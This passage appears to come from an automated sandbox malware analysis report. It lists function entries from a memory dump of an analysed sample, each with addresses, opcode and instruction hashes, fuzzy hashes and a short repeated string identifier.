                                                      • Opcode ID: ab82d107a417bd3c23316c510eb394ab8dedc9c26e98af62b46c36b8d4afa0bf
                                                      • Instruction ID: d66b2d34f0350904643056e8e7b1b1659d5a8ecd49a4372bcc48fd0e55c5488f
                                                      • Opcode Fuzzy Hash: ab82d107a417bd3c23316c510eb394ab8dedc9c26e98af62b46c36b8d4afa0bf
                                                      • Instruction Fuzzy Hash: 56A011B200008A82032800AA0220ACBA8AA82888282E30228880AEBA008022CA0E08E0
                                                      Function 0797076F Relevance: 6.3, Strings: 5, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 7bff4b5b22a49d2690b8acdf07c8c5c8a401828a515f06683946d0894d952c6d
                                                      • Instruction ID: a9dcdc7765a38679dd910b0d59db7d76c1b17f62811a8a768fae427e1452c808
                                                      • Opcode Fuzzy Hash: 7bff4b5b22a49d2690b8acdf07c8c5c8a401828a515f06683946d0894d952c6d
                                                      • Instruction Fuzzy Hash: 0AB0123355543F4AE5025E0C5D140A6231CEB04D40798052AAC08CF290C5234244C6D1
                                                      Function 07970891 Relevance: 6.3, Strings: 5, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: b9d4fdf566834f81c08462d89b3f3e2666103ff0acb887e875a76fececc43390
                                                      • Instruction ID: 9696c7c4b6e40c7375251cd6c45234a3ff1580746b9da5970af594c2ca3d7db6
                                                      • Opcode Fuzzy Hash: b9d4fdf566834f81c08462d89b3f3e2666103ff0acb887e875a76fececc43390
                                                      • Instruction Fuzzy Hash: DFA012738842AA10030212E80202608BD4A040589070903265C007F08AF14245010084
                                                      Function 079707B7 Relevance: 6.3, Strings: 5, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 5a6bb00fb32d660d4e1039c0913c3697d6c1836d170ec53d5da6ee05fe61ab9e
                                                      • Instruction ID: be0e42acc526f894d09a7b7a0013976f92b5419aa347469fc82a1e842d0fcd2e
                                                      • Opcode Fuzzy Hash: 5a6bb00fb32d660d4e1039c0913c3697d6c1836d170ec53d5da6ee05fe61ab9e
                                                      • Instruction Fuzzy Hash:
                                                      Function 079708F0 Relevance: 6.3, Strings: 5, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: c36c1ac16ac20fe811f2e44c379e0a4e1fc021f305c41be540312e86f1ba225d
                                                      • Instruction ID: 75481086d54e9e6a0e40737de78519ef20d9076bcf1220a5e5732535d1716075
                                                      • Opcode Fuzzy Hash: c36c1ac16ac20fe811f2e44c379e0a4e1fc021f305c41be540312e86f1ba225d
                                                      • Instruction Fuzzy Hash:
                                                      Function 0797084C Relevance: 6.3, Strings: 5, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: a5707a216f016a686301a30974ac427b7389b200a1ad89a141e7dbbdb4ba596a
                                                      • Instruction ID: 40d53acf7437acb7f87678c808938ad1ace035f6c42726e866f1d953f0eb7f59
                                                      • Opcode Fuzzy Hash: a5707a216f016a686301a30974ac427b7389b200a1ad89a141e7dbbdb4ba596a
                                                      • Instruction Fuzzy Hash: D1A00231543B2D4687496D0059A29CE63186D45548B65461C890487155DB10440E4290
                                                      Function 079708FD Relevance: 6.3, Strings: 5, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 4e1cb58632375a32260ab80e6b1c87c9fb7d4996183ed7864bf685704436adf6
                                                      • Instruction ID: d7326c7d074f0daed1b62de5eb5f46b2ef64cd636b90399ed7800c482bc45cac
                                                      • Opcode Fuzzy Hash: 4e1cb58632375a32260ab80e6b1c87c9fb7d4996183ed7864bf685704436adf6
                                                      • Instruction Fuzzy Hash:
                                                      Function 07970787 Relevance: 6.3, Strings: 5, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: a17d621547a3395501de539d17b1bda3ab1a97c07678bba2cf271335109b764b
                                                      • Instruction ID: a7abb54058c86d92a13b15c6aa3cdddc6b68cdd1afc2dc5f30fb4fe82332ca99
                                                      • Opcode Fuzzy Hash: a17d621547a3395501de539d17b1bda3ab1a97c07678bba2cf271335109b764b
                                                      • Instruction Fuzzy Hash:
                                                      Function 07970862 Relevance: 6.3, Strings: 5, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: efe0d363315c29cddf03cc16ebeb3c19bb0b91bc41932eba4bf8f9c77616e5c1
                                                      • Instruction ID: 201a8aab55fa3d28ca4dac37ec34a262b2ee7f663f7eb6ac142dcfde1c53df6a
                                                      • Opcode Fuzzy Hash: efe0d363315c29cddf03cc16ebeb3c19bb0b91bc41932eba4bf8f9c77616e5c1
                                                      • Instruction Fuzzy Hash: CDA0222033080020C82C0F3880208CE8200A22000C32CCE038C80E3302EA30B82A0FF0